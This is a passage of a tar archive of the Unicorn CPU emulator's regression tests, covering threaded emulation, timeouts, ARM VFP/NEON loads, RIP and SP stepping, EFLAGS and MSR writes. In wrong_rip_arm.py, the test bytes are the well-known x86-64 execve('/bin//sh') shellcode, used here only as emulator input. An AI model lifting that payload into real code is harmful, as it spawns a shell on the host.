here, NF is an output operand, it's flagged dead mov_i32 ZF,NF | # and the InMemory bit is clear, tell the previous(above) ops setcond_i32 CF,r2,tmp5,geu | # if it is used as output operand again, do not sync it xor_i32 VF,NF,r2 | # so the generated host-code for previous ops will not write it back to Memory xor_i32 tmp7,r2,tmp5 | # Caution: the CPU flags after this calculation is also right, because the set_label is a point of refresh, make them *REMEMBERED* and_i32 VF,VF,tmp7 | # Let's call this Part-B mov_i32 tmp6,NF | mov_i32 r2,ZF | set_label $0x2 ----------------- xor_i32 tmp5,VF,NF ----------------- movi_i32 tmp6,$0x0 | brcond_i32 tmp5,tmp6,lt,$0x3 | # Let's call this Part-A movi_i32 tmp5,$0x64 | # if Part-B is not skipped, this part won't go wrong, because we'll check the CPU flags as the result of Part-B, it's *REMEMBERED* movi_i32 r3,$0x64 |-----> # but if Part-B is skipped, set_label $0x3 | # what should we expected? we will check the condition based on the result of Part-D!!! call wfi,$0x0,$0,env | # because result of Part-C is lost. this is why things go wrong. set_label $0x0 | exit_tb $0x7f6401714013 ----------------- ########### ----- TCG ends ------ ''' TestCode = b'\xa1\x01\x50\xe1\xa1\x01\x40\x20\x01\x00\x50\xe3\x21\x12\xa0\xe1\x04\x20\x52\xa2\x64\x30\xa0\xa3' def UseUcToEmulate(): try: uc_emu = Uc(UC_ARCH_ARM, UC_MODE_ARM) #if LoadCode(uc_emu, 2*MB, 0x9004): uc_emu.mem_map(0, 2*MB) uc_emu.reg_write(UC_ARM_REG_SP, 0x40000) uc_emu.reg_write(UC_ARM_REG_R0, 3) uc_emu.reg_write(UC_ARM_REG_R1, 24) uc_emu.reg_write(UC_ARM_REG_R2, 16) uc_emu.mem_write(0, TestCode) uc_emu.emu_start(0, 24) PrintArmRegisters(uc_emu) except UcError as e: print("ERROR: %s" % e) PrintArmRegisters(uc_emu) UseUcToEmulate() ���������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/threaded_emu_start.c����������������������������������������������������0000664�0000000�0000000�00000013466�14675241067�0022041�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Test for uc_open() and uc_emu_start() being called by different threads. This code will call uc_open() in the main thread and then attempt to call uc_emu_start() from its own thread. This would enable the emulator to run in the background while you do other things like handle user interface etc in the foreground. Currently "uc->qemu_global_mutex" is locked by uc_open() and unlocked by uc_emu_start(). This is a problem because the mutex implementation must be locked and unlocked by the same thread. This means that uc_open() and uc_emu_start() must be executed in the same thread. This is an unnecessary limitation which prevents the emulator from being able to be executed in the background. */ // windows specific #ifdef _MSC_VER #include <io.h> #include <windows.h> #include <process.h> #define PRIx64 "llX" #include <unicorn/unicorn.h> #ifdef _WIN64 #pragma comment(lib, "unicorn_staload64.lib") #else // _WIN64 #pragma comment(lib, "unicorn_staload.lib") #endif // _WIN64 // posix specific #else // _MSC_VER #include <unicorn/unicorn.h> #include "pthread.h" #endif // _MSC_VER // for win32 threads in mingw #ifdef _WIN32 #include <windows.h> #endif // common includes #include <string.h> // Test MIPS little endian code. // This should loop forever. const uint64_t addr = 0x100000; const unsigned char loop_test_code[] = { 0x02,0x00,0x04,0x24, // 100000: li $a0, 2 // loop1 0x00,0x00,0x00,0x00, // 100004: nop 0xFE,0xFF,0x80,0x14, // 100008: bnez $a0, loop1 0x00,0x00,0x00,0x00, // 10000C: nop }; bool test_passed_ok = false; int loop_count = 0; // This hook is used to show that code is executing in the emulator. static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("Code: %"PRIx64"\n", address); } typedef struct { uc_engine *uc; uint64_t startAddr; uint64_t endAddr; } EmuStarterParam_t; // This is a thread that just runs uc_emu_start() in it. // The code that it is executing in this case will run forever until it is stopped by uc_emu_stop(). static uc_err emu_starter(void* param) { uc_engine *uc; uint64_t start_addr; uint64_t end_addr; uc_err err; EmuStarterParam_t* starter_params = (EmuStarterParam_t *)param; uc = starter_params->uc; start_addr = starter_params->startAddr; end_addr = starter_params->endAddr; printf("uc_emu_start()\n"); err = uc_emu_start(uc, start_addr, end_addr, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } return err; } #ifdef _WIN32 static unsigned int __stdcall win32_emu_starter(void* param) { uc_err err = emu_starter(param); _endthreadex(err); return err; } #else static void* posix_emu_starter(void* param) { uc_err err = emu_starter(param); return (void*)err; } #endif int main(int argc, char **argv, char **envp) { uc_engine *uc; uc_err err; int ret; uc_hook hhc; uint32_t val; EmuStarterParam_t starter_params; #ifdef _WIN32 HANDLE th = (HANDLE)-1; #else pthread_t th; #endif // Initialize emulator in MIPS 32bit little endian mode printf("uc_open()\n"); err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return err; } // map in a page of mem printf("uc_mem_map()\n"); err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL); if (err) { printf("Failed on uc_mem_map() with error returned: %u\n", err); return err; } // write machine code to be emulated to memory printf("uc_mem_write()\n"); err = uc_mem_write(uc, addr, loop_test_code, sizeof(loop_test_code)); if( err ) { printf("Failed on uc_mem_write() with error returned: %u\n", err); return err; } // hook all instructions by having @begin > @end printf("uc_hook_add()\n"); uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0); if( err ) { printf("Failed on uc_hook_add(code) with error returned: %u\n", err); return err; } // start background thread printf("---- Thread Starting ----\n"); starter_params.uc = uc; starter_params.startAddr = addr; starter_params.endAddr = addr + sizeof(loop_test_code); #ifdef _WIN32 // create thread th = (HANDLE)_beginthreadex(NULL, 0, win32_emu_starter, &starter_params, CREATE_SUSPENDED, NULL); if(th == (HANDLE)-1) { printf("Failed on _beginthreadex() with error returned: %p\n", _errno()); return -1; } // start thread ret = ResumeThread(th); if( ret == -1 ) { printf("Failed on ResumeThread() with error returned: %p\n", _errno()); return -2; } // wait 3 seconds Sleep(3 * 1000); #else // add posix code to start the emu_starter() thread ret = pthread_create(&th, NULL, posix_emu_starter, &starter_params); if( ret ) { printf("Failed on pthread_create() with error returned: %u\n", err); return -2; } // wait 3 seconds sleep(3); #endif // Stop the thread after it has been let to run in the background for a while printf("---- Thread Stopping ----\n"); printf("uc_emu_stop()\n"); err = uc_emu_stop(uc); if( err ) { printf("Failed on uc_emu_stop() with error returned: %u\n", err); return err; } test_passed_ok = true; // done executing, print some reg values as a test uc_reg_read(uc, UC_MIPS_REG_PC, &val); printf("pc is %X\n", val); uc_reg_read(uc, UC_MIPS_REG_A0, &val); printf("a0 is %X\n", val); // free resources printf("uc_close()\n"); uc_close(uc); if( test_passed_ok ) printf("\n\nTEST PASSED!\n\n"); else printf("\n\nTEST FAILED!\n\n"); return 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/timeout_segfault.c������������������������������������������������������0000664�0000000�0000000�00000010616�14675241067�0021550�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* timeout_segfault.c This program shows a case where the emulation timer keeps running after emulation has ended. It triggers an intermittent segfault when _timeout_fn() tries to call uc_emu_stop() after emulation has already been cleaned up. This code is the same as samples/sample_arm.c, except that it adds a timeout on each call to uc_emu_start(). See issue #78 for more details: https://github.com/unicorn-engine/unicorn/issues/78 */ #include <unicorn/unicorn.h> // code to be emulated #define ARM_CODE "\x37\x00\xa0\xe3\x03\x10\x42\xe0" // mov r0, #0x37; sub r1, r2, r3 #define THUMB_CODE "\x83\xb0" // sub sp, #0xc // memory address where emulation starts #define ADDRESS 0x10000 // number of seconds to wait before timeout #define TIMEOUT 5 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%"PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%"PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_arm(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r0 = 0x1234; // R0 register int r2 = 0x6789; // R1 register int r3 = 0x3333; // R2 register int r1; // R1 register printf("Emulate ARM code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, ARM_CODE, sizeof(ARM_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM_REG_R0, &r0); uc_reg_write(uc, UC_ARM_REG_R2, &r2); uc_reg_write(uc, UC_ARM_REG_R3, &r3); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(ARM_CODE) -1, UC_SECOND_SCALE * TIMEOUT, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_ARM_REG_R0, &r0); uc_reg_read(uc, UC_ARM_REG_R1, &r1); printf(">>> R0 = 0x%x\n", r0); printf(">>> R1 = 0x%x\n", r1); uc_close(uc); } static void test_thumb(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int sp = 0x1234; // R0 register printf("Emulate THUMB code\n"); // Initialize emulator in ARM mode err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, THUMB_CODE, sizeof(THUMB_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_ARM_REG_SP, &sp); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(THUMB_CODE) -1, UC_SECOND_SCALE * TIMEOUT, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_ARM_REG_SP, &sp); printf(">>> SP = 0x%x\n", sp); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_arm(); printf("==========================\n"); test_thumb(); return 0; } ������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/translator_buffer.py����������������������������������������������������0000775�0000000�0000000�00000004710�14675241067�0022121�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python # By Mariano Graziano from unicorn import * from unicorn.x86_const import * import regress, struct class Emulator: def __init__(self, code, stack): self.mask = 0xFFFFFFFFFFFFF000 self.unicorn_code = code self.unicorn_stack = stack self.mu = Uc(UC_ARCH_X86, UC_MODE_64) size = 1 * 4096 self.mu.mem_map(code & self.mask, size) size = 1 * 4096 self.mu.mem_map(stack & self.mask, size) self.set_hooks() def set_hooks(self): self.mu.hook_add(UC_HOOK_MEM_WRITE, self.hook_mem_access) self.mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, self.hook_mem_invalid) self.mu.hook_add(UC_HOOK_MEM_FETCH_UNMAPPED, self.hook_mem_fetch_unmapped) def hook_mem_fetch_unmapped(self, uc, access, address, size, value, user_data): next_ip = self.unicorn_code + size self.mu.reg_write(UC_X86_REG_RIP, next_ip) self.mu.mem_write(next_ip, "\x90") self.mu.reg_write(UC_X86_REG_RIP, address) return True def hook_mem_invalid(self, uc, access, address, size, value, user_data): return True def hook_mem_access(self, uc, access, address, size, value, user_data): return True def emu(self, size): ip = self.mu.reg_read(UC_X86_REG_RIP) try: self.mu.emu_start(ip, ip + size, timeout=10000, count=1) except UcError as e: print("Error %s" % e) def write_data(self, address, content): self.mu.mem_write(address, content) class Init(regress.RegressTest): def init_unicorn(self, ip, sp, counter): #print "[+] Emulating IP: %x SP: %x - Counter: %x" % (ip, sp, counter) E = Emulator(ip, sp) E.write_data(ip, "\x90") E.write_data(sp, self.generate_value(counter)) E.mu.reg_write(UC_X86_REG_RSP, sp) E.mu.reg_write(UC_X86_REG_RIP, ip) E.emu(1) def generate_value(self, counter): start = 0xffff880026f02000 offset = counter * 8 address = start + offset return struct.pack("<Q", address) def runTest(self): global mu ips = list(range(0xffffffff816a9000, 0xffffffff816af000, 0x1)) sps = list(range(0xffff88001b800000, 0xffff88001b801000, 0x1)) j = 0 for i in ips: j += 1 index = ips.index(i) self.init_unicorn(i, sps[index], j) if __name__ == '__main__': regress.main() ��������������������������������������������������������unicorn-2.1.1/tests/regress/vld.py������������������������������������������������������������������0000775�0000000�0000000�00000007777�14675241067�0017204�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Moshe Kravchik from __future__ import print_function from unicorn import * from unicorn.arm_const import * import binascii import regress # code to be emulated #enable VFP ''' 00000016 f44f0370 mov.w r3, #0xf00000 0000001a ee013f50 mcr p15, #0x0, r3, c1, c0, #0x2 0000bfb6 f3bf8f6f isb sy 0000bfba f04f4380 mov.w r3, #0x40000000 0000bfbe eee83a10 vmsr fpexc, r3 ''' ENABLE_VFP_CODE = "\x4f\xf4\x70\x03\x01\xee\x50\x3f\xbf\xf3\x6f\x8f\x4f\xf0\x80\x43\xe8\xee\x10\x3a" VLD_CODE = "\x21\xf9\x0f\x6a" #0000002a f9216a0f vld1.8 {d6, d7}, [r1] VST_CODE = "\x00\xf9\x0f\x6a" #0000002e f9006a0f vst1.8 {d6, d7}, [r0] # memory address where emulation starts ADDRESS = 0x10000 SCRATCH_ADDRESS = 0x1000 class SIMDNotReadArm(regress.RegressTest): def runTest(self): code = ENABLE_VFP_CODE+VLD_CODE+VST_CODE print("Emulate THUMB code") try: # Initialize emulator in thumb mode mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, code) # map 10K scratch memory for this emulation mu.mem_map(SCRATCH_ADDRESS, 10 * 1024) # write dummy data to be emulated to memory mu.mem_write(SCRATCH_ADDRESS, "\x01"*64) # initialize machine registers for i in range(UC_ARM_REG_R0, UC_ARM_REG_R12): val = mu.reg_write(i, i - UC_ARM_REG_R0) mu.reg_write(UC_ARM_REG_R1, SCRATCH_ADDRESS) mu.reg_write(UC_ARM_REG_R0, SCRATCH_ADDRESS + 0x100) mu.reg_write(UC_ARM_REG_SP, 0x1234) mu.reg_write(UC_ARM_REG_D6, UC_ARM_REG_D6) mu.reg_write(UC_ARM_REG_D7, UC_ARM_REG_D7) print(">>> Before emulation ") print("\tD6 = 0x%x" % mu.reg_read(UC_ARM_REG_D6)) print("\tD7 = 0x%x" % mu.reg_read(UC_ARM_REG_D7)) for i in range(UC_ARM_REG_R0, UC_ARM_REG_R12): val = mu.reg_read(i) print("\t %s = 0x%x" % ("R" + str(i-UC_ARM_REG_R0),val)) self.assertEqual(UC_ARM_REG_D6, mu.reg_read(UC_ARM_REG_D6)) self.assertEqual(UC_ARM_REG_D7, mu.reg_read(UC_ARM_REG_D7)) try: content = mu.mem_read(SCRATCH_ADDRESS, 100) print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS, binascii.hexlify(content))) content = mu.mem_read(SCRATCH_ADDRESS+0x100, 100) print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS+0x100, binascii.hexlify(content))) except Exception, errtxt: print (errtxt) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(code)) # now print out some registers print(">>> Emulation done. Below is the CPU context") sp = mu.reg_read(UC_ARM_REG_SP) print(">>> SP = 0x%x" %sp) val = mu.reg_read(UC_ARM_REG_PC) print(">>> PC = 0x%x" %val) for i in range(UC_ARM_REG_R0, UC_ARM_REG_R12): val = mu.reg_read(i) print(">>> %s = 0x%x" % ("R" + str(i-UC_ARM_REG_R0),val)) print("\tD6 = 0x%x" % mu.reg_read(UC_ARM_REG_D6)) print("\tD7 = 0x%x" % mu.reg_read(UC_ARM_REG_D7)) try: content = mu.mem_read(SCRATCH_ADDRESS, 100) print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS, binascii.hexlify(content))) content = mu.mem_read(SCRATCH_ADDRESS+0x100, 100) print("Memory at addr 0x%X %s" % (SCRATCH_ADDRESS+0x100, binascii.hexlify(content))) except Exception, errtxt: print (errtxt) self.assertEqual(mu.reg_read(UC_ARM_REG_D6), 0x0101010101010101) self.assertEqual(mu.reg_read(UC_ARM_REG_D7), 0x0101010101010101) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': regress.main() �unicorn-2.1.1/tests/regress/write_before_map.py�����������������������������������������������������0000775�0000000�0000000�00000001031�14675241067�0021701�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python from __future__ import print_function from unicorn import * from unicorn.x86_const import * import regress X86_CODE64 = "\x90" # NOP class WriteBeforeMap(regress.RegressTest): def runTest(self): # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_64) # memory address where emulation starts ADDRESS = 0x1000000 # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE64) if __name__ == '__main__': regress.main() �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/wrong_rip.py������������������������������������������������������������0000775�0000000�0000000�00000004720�14675241067�0020406�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.x86_const import * import regress binary1 = b'\xb8\x02\x00\x00\x00' # mov eax, 2 binary2 = b'\xb8\x01\x00\x00\x00' # mov eax, 1 class WrongRIP(regress.RegressTest): def test_step(self): mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(0, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(0, binary1 + binary2) # emu for maximum 1 instruction. mu.emu_start(0, 5, 0, 1) self.assertEqual(0x2, mu.reg_read(UC_X86_REG_RAX)) self.assertEqual(0x5, mu.reg_read(UC_X86_REG_RIP)) mu.emu_start(5, 10, 0, 1) self.assertEqual(0xa, mu.reg_read(UC_X86_REG_RIP)) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_RAX)) def test_step2(self): mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(0, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(0, binary1 + binary2) # emu for maximum 1 instruction. mu.emu_start(0, 10, 0, 1) self.assertEqual(0x2, mu.reg_read(UC_X86_REG_RAX)) self.assertEqual(0x5, mu.reg_read(UC_X86_REG_RIP)) mu.emu_start(5, 10, 0, 1) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_RAX)) self.assertEqual(0xa, mu.reg_read(UC_X86_REG_RIP)) def test_step3(self): bin3 = b'\x40\x01\xc1\x31\xf6' # inc eax; add ecx, eax; xor esi, esi mu = Uc(UC_ARCH_X86, UC_MODE_32) mu.mem_map(0, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(0, bin3) # emu for maximum 1 instruction. mu.emu_start(0, 10, 0, 1) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EAX)) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EIP)) def test_step_then_fin(self): bin4 = b'\x40\x01\xc1\x31\xf6\x90\x90\x90' # inc eax; add ecx, eax; xor esi, esi mu = Uc(UC_ARCH_X86, UC_MODE_32) mu.mem_map(0, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(0, bin4) # emu for maximum 1 instruction. mu.emu_start(0, len(binary1), 0, 1) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EAX)) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EIP)) # emu to the end mu.emu_start(1, len(bin4)) self.assertEqual(0x1, mu.reg_read(UC_X86_REG_EAX)) self.assertEqual(len(bin4), mu.reg_read(UC_X86_REG_EIP)) if __name__ == '__main__': regress.main() ������������������������������������������������unicorn-2.1.1/tests/regress/wrong_rip_arm.py��������������������������������������������������������0000775�0000000�0000000�00000002065�14675241067�0021245�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.x86_const import * from unicorn.arm_const import * import regress # adds r1, #0x48 # ldrsb r7, [r7, r7] # ldrsh r7, [r2, r1] # ldr r0, [pc, #0x168] # cmp r7, #0xbf # str r7, [r5, #0x20] # ldr r1, [r5, #0x64] # strb r7, [r5, #0xc] # ldr r0, [pc, #0x1a0] binary1 = b'\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05' # binary1 = b'\x48\x31\xff\x57' #adds r1, #0x48 #ldrsb r7, [r7, r7] class WrongRIPArm(regress.RegressTest): def runTest(self): mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) mu.mem_map(0, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(0, binary1) mu.reg_write(UC_ARM_REG_R13, 1 * 1024 * 1024) # emu for maximum 1 instruction. mu.emu_start(0, len(binary1), 0, 1) self.assertEqual(0x48, mu.reg_read(UC_ARM_REG_R1)) pos = mu.reg_read(UC_ARM_REG_R15) self.assertEqual(0x2, pos) if __name__ == '__main__': regress.main() ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/wrong_sp_arm.py���������������������������������������������������������0000775�0000000�0000000�00000001325�14675241067�0021073�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python # By Ryan Hileman, issue #16 from unicorn import * from unicorn.arm_const import * from unicorn.arm64_const import * import regress class WrongSPArm(regress.RegressTest): def test_32(self): with self.assertRaises(UcError): uc = Uc(UC_ARCH_ARM, UC_MODE_32) uc.reg_write(UC_ARM_REG_SP, 4) def test_64(self): uc = Uc(UC_ARCH_ARM64, UC_MODE_ARM) uc.reg_write(UC_ARM64_REG_SP, 4) self.assertEqual(0x4, uc.reg_read(UC_ARM64_REG_SP)) def test_arm(self): uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) uc.reg_write(UC_ARM_REG_SP, 4) self.assertEqual(0x4, uc.reg_read(UC_ARM_REG_SP)) if __name__ == '__main__': regress.main() �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_16_segfault.c�������������������������������������������������������0000664�0000000�0000000�00000001165�14675241067�0021014�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define BINARY "\x90" #define MEMORY_SIZE 4 * 1024 #define STARTING_ADDRESS 100 * 1024 int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(UC_ARCH_X86, UC_MODE_16, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, STARTING_ADDRESS, MEMORY_SIZE, UC_PROT_ALL); if (uc_mem_write(uc, STARTING_ADDRESS, BINARY, sizeof(BINARY) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } printf("uc_emu_start(…)\n"); uc_emu_start(uc, STARTING_ADDRESS, STARTING_ADDRESS + sizeof(BINARY) - 1, 0, 20); printf("done\n"); return 0; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_64_conditional_jump.py����������������������������������������������0000775�0000000�0000000�00000003114�14675241067�0022750�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python import regress import unicorn as U class WrongConditionalPath(regress.RegressTest): def test_eflags(self): # 0: 4d 31 f6 xor r14, r14 # 3: 45 85 f6 test r14d, r14d # 6: 75 fe jne 0x6 # 8: f4 hlt CODE = 'M1\xf6E\x85\xf6u\xfe\xf4' uc = U.Uc(U.UC_ARCH_X86, U.UC_MODE_64) uc.reg_write(U.x86_const.UC_X86_REG_RIP, 0x6000b0) uc.reg_write(U.x86_const.UC_X86_REG_EFLAGS, 0x246) uc.mem_map(0x600000, 0x1000) uc.mem_write(0x6000b0, CODE) uc.emu_start(0x6000b0 + 6, 0, count=1) # Here's the original execution trace for this on qemu-user. # # $ SC='xor r14,r14; test r14d, r14d; jne $; hlt' # $ asm --context amd64 --format elf $SC > example # $ qemu-x86_64-static -d cpu,in_asm -singlestep ./test \ # | grep -E 'RFL|^0x' # 0x00000000006000b0: xor %r14,%r14 # RIP=00000000006000b0 RFL=00000202 [-------] CPL=3 II=0 A20=1 SMM=0 HLT=0 # 0x00000000006000b3: test %r14d,%r14d # RIP=00000000006000b3 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0 # 0x00000000006000b6: jne 0x6000b6 # RIP=00000000006000b6 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0 # 0x00000000006000b8: hlt # RIP=00000000006000b8 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0 self.assertEqual(0x6000b0 + 8, uc.reg_read(U.x86_const.UC_X86_REG_RIP)) if __name__ == '__main__': regress.main() ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_64_eflags.py��������������������������������������������������������0000775�0000000�0000000�00000002046�14675241067�0020656�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python import regress import unicorn as U class WrongEFLAGS(regress.RegressTest): def test_eflags(self): # xor r14,r14 CODE = 'M1\xf6' uc = U.Uc(U.UC_ARCH_X86, U.UC_MODE_64) uc.reg_write(U.x86_const.UC_X86_REG_RIP, 0x6000b0) uc.reg_write(U.x86_const.UC_X86_REG_EFLAGS, 0x200) uc.mem_map(0x600000, 0x1000) uc.mem_write(0x6000b0, CODE) uc.emu_start(0x6000b0, 0, count=1) # Here's the original execution trace for this on actual hardware. # # (gdb) x/i $pc # => 0x6000b0: xor %r14,%r14 # (gdb) p/x $eflags # $1 = 0x200 # (gdb) p $eflags # $2 = [ IF ] # (gdb) si # 0x00000000006000b3 in ?? () # (gdb) p/x $eflags # $3 = 0x246 # (gdb) p $eflags # $4 = [ PF ZF IF ] self.assertEqual(0x6000b3, uc.reg_read(U.x86_const.UC_X86_REG_RIP)) self.assertEqual(0x246, uc.reg_read(U.x86_const.UC_X86_REG_EFLAGS)) if __name__ == '__main__': regress.main() ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_64_msr.py�����������������������������������������������������������0000775�0000000�0000000�00000010304�14675241067�0020212�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python from unicorn import * from unicorn.x86_const import * from struct import pack import regress CODE_ADDR = 0x40000 CODE_SIZE = 0x1000 SCRATCH_ADDR = 0x80000 SCRATCH_SIZE = 0x1000 SEGMENT_ADDR = 0x5000 SEGMENT_SIZE = 0x1000 FSMSR = 0xC0000100 GSMSR = 0xC0000101 def set_msr(uc, msr, value, scratch=SCRATCH_ADDR): ''' set the given model-specific register (MSR) to the given value. this will clobber some memory at the given scratch address, as it emits some code. ''' # save clobbered registers orax = uc.reg_read(UC_X86_REG_RAX) ordx = uc.reg_read(UC_X86_REG_RDX) orcx = uc.reg_read(UC_X86_REG_RCX) orip = uc.reg_read(UC_X86_REG_RIP) # x86: wrmsr buf = '\x0f\x30' uc.mem_write(scratch, buf) uc.reg_write(UC_X86_REG_RAX, value & 0xFFFFFFFF) uc.reg_write(UC_X86_REG_RDX, (value >> 32) & 0xFFFFFFFF) uc.reg_write(UC_X86_REG_RCX, msr & 0xFFFFFFFF) uc.emu_start(scratch, scratch+len(buf), count=1) # restore clobbered registers 